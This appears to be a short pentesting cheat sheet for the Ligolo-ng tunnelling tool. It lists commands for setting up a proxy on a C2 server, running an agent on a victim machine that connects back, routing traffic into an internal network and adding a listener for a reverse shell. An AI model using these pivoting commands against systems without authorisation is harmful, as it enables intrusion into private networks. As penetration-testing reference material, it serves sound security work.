- a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a **tun interface** (**without the need of SOCKS**) - [Quickstart - Ligolo-ng Documentation](https://docs.ligolo.ng/Quickstart/) # Create a new tunnel device Linux ```bash sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up # On Ligolo-ng >= v0.6 interface_create --name "<username>" ``` Windows - You need to download the `Wintun` driver (used by `WireGuard`) and place the `wintun.dll` in the same folder as Ligolo # Start the Ligolo-ng proxy server Start the *proxy* server on your C2 server ```bash ./proxy -h ./proxy -autocert # automatically request LetsEncrypt certificates ./proxy -selfcert # use self-signed certificates ``` # Start the agent Start the *agent* on your target (victim) computer (no privileges are required) ```bash ./agent -connect <proxy_server>:<port> # if proxy server chose -selfcert ./agent -connect <proxy_server>:<port> -ignore-cert ``` -A session should appear on *proxy* server. -Use the `session` command to select the *agent*. # Add routes on the attacker machine ```bash sudo ip route add 172.32.1.0/24 dev ligolo ip route list # or autoroute ``` # Back to the proxy server and start ligolo ```bash start # when making a second tunnel start --tun <tunnel_name> ``` # Set up listener and obtain reverse shell from `internal network` to attacker machine when they are in separate networks. ```bash listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4130 --tcp listener_list ```